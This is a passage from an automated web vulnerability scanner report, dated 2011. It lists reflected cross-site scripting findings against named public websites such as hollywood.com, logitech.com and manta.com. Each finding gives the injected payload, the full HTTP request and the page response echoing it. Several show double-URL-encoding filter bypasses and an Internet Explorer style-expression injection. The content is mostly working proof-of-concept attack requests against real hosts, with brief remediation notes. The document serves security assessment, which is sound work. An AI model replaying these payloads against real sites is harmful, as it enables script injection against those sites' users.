The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 79fd0"%3b8fb452cbcec was submitted in the REST URL parameter 1. This input was echoed as 79fd0";8fb452cbcec in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /favicon.ico79fd0"%3b8fb452cbcec HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.healthline.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache
P3P: CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Content-Type: text/html;charset=UTF-8
Date: Thu, 31 Mar 2011 20:22:01 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 51644

<!--
URI: /favicon.ico79fd0";8fb452cbcecservletName: defaultstatusCode: 404
-->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<
...[SNIP]...
cadc=0;var erpm=0;
/*var unicaEvents = new Array();
var unicaEventIdx = 0;*/
var g_cfn="generalhealth";
var g_cfn_bold = "generalhealth";
var g_encoded_uri = encodeURI("/favicon.ico79fd0";8fb452cbcec");
</script>
...[SNIP]...

1.64. http://www.hollywood.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hollywood.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fb99a%2522%253balert%25281%2529%252f%252f03025ba1a26 was submitted in the REST URL parameter 1. This input was echoed as fb99a";alert(1)//03025ba1a26 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /favicon.icofb99a%2522%253balert%25281%2529%252f%252f03025ba1a26 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.hollywood.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Thu, 31 Mar 2011 20:26:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=pjhbcxuawjdzbqze0vvs4155; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 15980


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title>Hollywood.com </title>
<script type="text
...[SNIP]...
function _hbEvent(a,b){b=_hbE[_hbEC++]=new Object();b._N=a;b._C=0;return b;}
var hbx=_hbEvent("pv");hbx.vpc="HBX0100u";hbx.gn="h.hollywood.com";
hbx.acct="DM550817IOBZ38EN3";
hbx.pn="404/favicon.icofb99a";alert(1)//03025ba1a26";
hbx.mlc="Error";hbx.pndef="";hbx.ctdef="full";hbx.lt="auto";
hbx.dlf="n";
</script>
...[SNIP]...

1.65. http://www.inc.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.inc.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e37f8"><script>alert(1)</script>b1d942b5500 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icoe37f8"><script>alert(1)</script>b1d942b5500 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.inc.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Thu, 31 Mar 2011 21:00:28 GMT
Server: VoxCAST
X-Powered-By: PHP/5.2.11
Content-Type: text/html; charset=UTF-8
X-Cache: MISS from VoxCAST
Content-Length: 40001

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="returl" value="http://www.inc.com/favicon.icoe37f8"><script>alert(1)</script>b1d942b5500">
...[SNIP]...

1.66. http://www.instructables.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.instructables.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9d1c6<script>alert(1)</script>b7be8b4f11a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico9d1c6<script>alert(1)</script>b7be8b4f11a HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.instructables.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.28
P3P: IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA
Content-Length: 17716
Cache-Control: no-cache
X-Cacheable: no-404
Date: Thu, 31 Mar 2011 20:18:02 GMT
X-Varnish: 769684798
Age: 0
Via: 1.1 varnish
X-Cache-Svr: squid04.instructables.com
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.c
...[SNIP]...
<p>
&nbsp;&nbsp;We're sorry, the URL http://www.instructables.com/favicon.ico9d1c6<script>alert(1)</script>b7be8b4f11a is either incorrect or no longer available. Maybe you are looking for one of the following Instructables below.
</p>
...[SNIP]...

1.67. http://www.intellicast.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.intellicast.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 415f4%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522ca9c51b078d was submitted in the REST URL parameter 1. This input was echoed as 415f4"style="x:expression(alert(1))"ca9c51b078d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /favicon.ico415f4%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522ca9c51b078d HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.intellicast.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Cneonction: close
Date: Thu, 31 Mar 2011 20:52:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=s33at255qtu5gxqr3snlnj55; path=/; HttpOnly
Set-Cookie: RecentLocations=@:; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 42737
Set-Cookie: NSC_jdbtu_efgbvmu_iuuq_wt=ffffffff094a140645525d5f4f58455e445a4a423660;expires=Thu, 31-Mar-2011 21:12:17 GMT;path=/;httponly


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_ctl00_Head1"><title>
   In
...[SNIP]...
<a href="/Redirect.aspx?unit=C&error=404?404;http://www.intellicast.com:80/favicon.ico415f4"style="x:expression(alert(1))"ca9c51b078d">
...[SNIP]...

1.68. http://www.kaboose.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kaboose.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b3a7e</script><script>alert(1)</script>9c95a9e9202 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /favicon.icob3a7e</script><script>alert(1)</script>9c95a9e9202 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.kaboose.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Thu, 31 Mar 2011 20:32:10 GMT
Server: Apache/2.2.11 (Unix) DAV/2 PHP/4.4.9
X-Powered-By: PHP/4.4.9
Set-Cookie: ad_types_404.html=itype%3DBanner2%26itype%3DSponsorLink2%26itype%3DSponsorLink1%26itype%3DRectangle2%26itype%3DSponsorFeature%26itype%3DRectangle%26itype%3DSponsorBar%26itype%3DSkyscraper-Left%26itype%3DSponsorLogo%26itype%3DPeelback2%26itype%3DOverPage%26itype%3DInterstitial%26itype%3DCatfish%26itype%3DPeelback%26itype%3DBanner; expires=Thu, 31 Mar 2011 20:36:10 GMT
Content-Type: text/html; charset=utf-8
X-UA-COMPATIBLE: IE=EmulateIE7
Content-Length: 86191

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">


<he
...[SNIP]...
<script type="text/javascript">
mboxCreate('KAB_Global_Mbox', "pageName=www.kaboose.com/favicon.icob3a7e</script><script>alert(1)</script>9c95a9e9202");
</script>
...[SNIP]...

1.69. http://www.letssingit.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.letssingit.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fd1d8"-alert(1)-"9734fb6d31b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /favicon.icofd1d8"-alert(1)-"9734fb6d31b HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.letssingit.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Thu, 31 Mar 2011 20:46:40 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: country=us; expires=Saturday, 30-Apr-2011 20:46:40 GMT;path=/; domain=.letssingit.com
Set-Cookie: language=en; expires=Saturday, 30-Apr-2011 20:46:40 GMT;path=/; domain=.letssingit.com
Set-Cookie: session_views=1; path=/; domain=.letssingit.com
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 22648

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>
<TITLE>Lyrics, albums, songs, artists and more music | LetsSingIt</TITLE>
<META http-equiv="content-type" content="tex
...[SNIP]...
<script type="text/javascript">COMSCORE.beacon({c1:2,c2:"6772046",c3:"",c4:"www.letssingit.com/favicon.icofd1d8"-alert(1)-"9734fb6d31b",c5:"",c6:"",c15:""});</script>
...[SNIP]...

1.70. http://www.letssingit.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.letssingit.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 23b93"><script>alert(1)</script>3d2ada0bfcc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico23b93"><script>alert(1)</script>3d2ada0bfcc HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.letssingit.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Thu, 31 Mar 2011 20:46:39 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: country=us; expires=Saturday, 30-Apr-2011 20:46:39 GMT;path=/; domain=.letssingit.com
Set-Cookie: language=en; expires=Saturday, 30-Apr-2011 20:46:39 GMT;path=/; domain=.letssingit.com
Set-Cookie: session_views=1; path=/; domain=.letssingit.com
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 22663

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>
<TITLE>Lyrics, albums, songs, artists and more music | LetsSingIt</TITLE>
<META http-equiv="content-type" content="tex
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6772046&amp;c3=&amp;c4=www.letssingit.com/favicon.ico23b93"><script>alert(1)</script>3d2ada0bfcc&amp;c5=&amp;c6=&amp;c15=&amp;cj=1"/>
...[SNIP]...

1.71. http://www.logitech.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 865e9"><script>alert(1)</script>7486580f0c3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico865e9"><script>alert(1)</script>7486580f0c3 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.logitech.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Thu, 31 Mar 2011 21:22:05 GMT
Connection: keep-alive
Content-Length: 34644


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<link rel="canonical" href="http://www.logitech.com/favicon.ico865e9"><script>alert(1)</script>7486580f0c3" />
...[SNIP]...

1.72. http://www.logitech.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 43a0b</script><script>alert(1)</script>053b8181b3d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /favicon.ico43a0b</script><script>alert(1)</script>053b8181b3d HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.logitech.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Thu, 31 Mar 2011 21:22:11 GMT
Connection: keep-alive
Content-Length: 34683


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','favicon.ico43a0b</script><script>alert(1)</script>053b8181b3d' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm,'WT.z_partnum','');
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech
...[SNIP]...

1.73. http://www.lulu.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lulu.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 28c16"><script>alert(1)</script>ab163775080 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico28c16"><script>alert(1)</script>ab163775080 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.lulu.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Thu, 31 Mar 2011 21:53:22 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: LULU_LOCALE=a%3A3%3A%7Bs%3A7%3A%22country%22%3Bi%3A840%3Bs%3A8%3A%22currency%22%3Bs%3A3%3A%22USD%22%3Bs%3A6%3A%22locale%22%3Bs%3A5%3A%22en_US%22%3B%7D; expires=Mon, 31-Mar-2031 21:53:23 GMT; path=/; domain=.lulu.com
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 22659

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphpr
...[SNIP]...
<link rel="canonical" href="http://www.lulu.com/favicon.ico28c16"><script>alert(1)</script>ab163775080" />
...[SNIP]...

1.74. http://www.mainstreet.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mainstreet.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 912d0"><script>alert(1)</script>2b43f02c700 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico912d0"><script>alert(1)</script>2b43f02c700 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mainstreet.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Thu, 31 Mar 2011 20:50:28 GMT
Server: Apache
Set-Cookie: SESS0e250a232fad80ec5d88c23e55d760d9=59bn5lji6t0nla4ll0q1uk8h55; expires=Sun, 24 Apr 2011 00:23:48 GMT; path=/; domain=.mainstreet.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Thu, 31 Mar 2011 20:50:28 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
X-Debug: msweb06
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 27781

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!--
Node type: site_content (4100)
Node title: 404 Page
Last Generated: 20110
...[SNIP]...
<link rel="canonical" href="http://www.mainstreet.com/favicon.ico912d0"><script>alert(1)</script>2b43f02c700" />
...[SNIP]...

1.75. http://www.manta.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.manta.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e93d7<script>alert(1)</script>f43fd169a2c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icoe93d7<script>alert(1)</script>f43fd169a2c HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.manta.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 403 Access Denied
Server: nginx/0.7.62
Date: Thu, 31 Mar 2011 20:06:25 GMT
Content-Type: text/html
Connection: keep-alive
Vary: Accept-Encoding
Content-Length: 4714
X-Varnish: 2349927144
Via: 1.1 varnish
X-Served-By: ecnext42
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<br>
Access Denied: http://www.manta.com/favicon.icoe93d7<script>alert(1)</script>f43fd169a2c at Thu Mar 31 20:06:25 2011 +0000 from 173.193.214.243<br>
...[SNIP]...

1.76. http://www.manta.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.manta.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6db86"><script>alert(1)</script>8ee9b35128d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico6db86"><script>alert(1)</script>8ee9b35128d HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.manta.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 403 Access Denied
Server: nginx/0.7.62
Date: Thu, 31 Mar 2011 20:06:25 GMT
Content-Type: text/html
Connection: keep-alive
Vary: Accept-Encoding
Content-Length: 4718
X-Varnish: 3102407052
Via: 1.1 varnish
X-Served-By: ecnext41
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<a href="mailto:webmaster@ecnext.com?subject=403 error&body=Access Denied: http://www.manta.com/favicon.ico6db86"><script>alert(1)</script>8ee9b35128d at Thu Mar 31 20:06:25 2011 +0000 from 173.193.214.243">
...[SNIP]...

1.77. http://www.manta.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.manta.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 28af8"><script>alert(1)</script>20b7a85cc1d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?28af8"><script>alert(1)</script>20b7a85cc1d=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.manta.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 403 Access Denied
Server: nginx/0.7.62
Date: Thu, 31 Mar 2011 20:06:24 GMT
Content-Type: text/html
Connection: keep-alive
Vary: Accept-Encoding
Content-Length: 4724
X-Varnish: 1282160997
Via: 1.1 varnish
X-Served-By: ecnext43
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<a href="mailto:webmaster@ecnext.com?subject=403 error&body=Access Denied: http://www.manta.com/favicon.ico?28af8"><script>alert(1)</script>20b7a85cc1d=1 at Thu Mar 31 20:06:24 2011 +0000 from 173.193.214.243">
...[SNIP]...

1.78. http://www.manta.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.manta.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload bd9eb<script>alert(1)</script>76a74a9ba72 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?bd9eb<script>alert(1)</script>76a74a9ba72=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.manta.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 403 Access Denied
Server: nginx/0.7.62
Date: Thu, 31 Mar 2011 20:06:25 GMT
Content-Type: text/html
Connection: keep-alive
Vary: Accept-Encoding
Content-Length: 4720
X-Varnish: 1282161037
Via: 1.1 varnish
X-Served-By: ecnext43
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<br>
Access Denied: http://www.manta.com/favicon.ico?bd9eb<script>alert(1)</script>76a74a9ba72=1 at Thu Mar 31 20:06:25 2011 +0000 from 173.193.214.243<br>
...[SNIP]...

1.79. http://www.mediaite.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mediaite.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7f12b"><script>alert(1)</script>8202a0642d4 was submitted in the REST URL parameter 1. This input was echoed as 7f12b\"><script>alert(1)</script>8202a0642d4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico7f12b"><script>alert(1)</script>8202a0642d4 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mediaite.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Thu, 31 Mar 2011 20:59:30 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Vary: Cookie
Set-Cookie: PHPSESSID=u4p28cpt9pmfa8dd3l1933a920; path=/
Set-Cookie: wordpress_test_cookie=WP+Cookie+check; path=/
Set-Cookie: wordpress_test_cookie=WP+Cookie+check; path=/
X-Pingback: http://www.mediaite.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 31 Mar 2011 20:59:30 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 33137

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="ht
...[SNIP]...
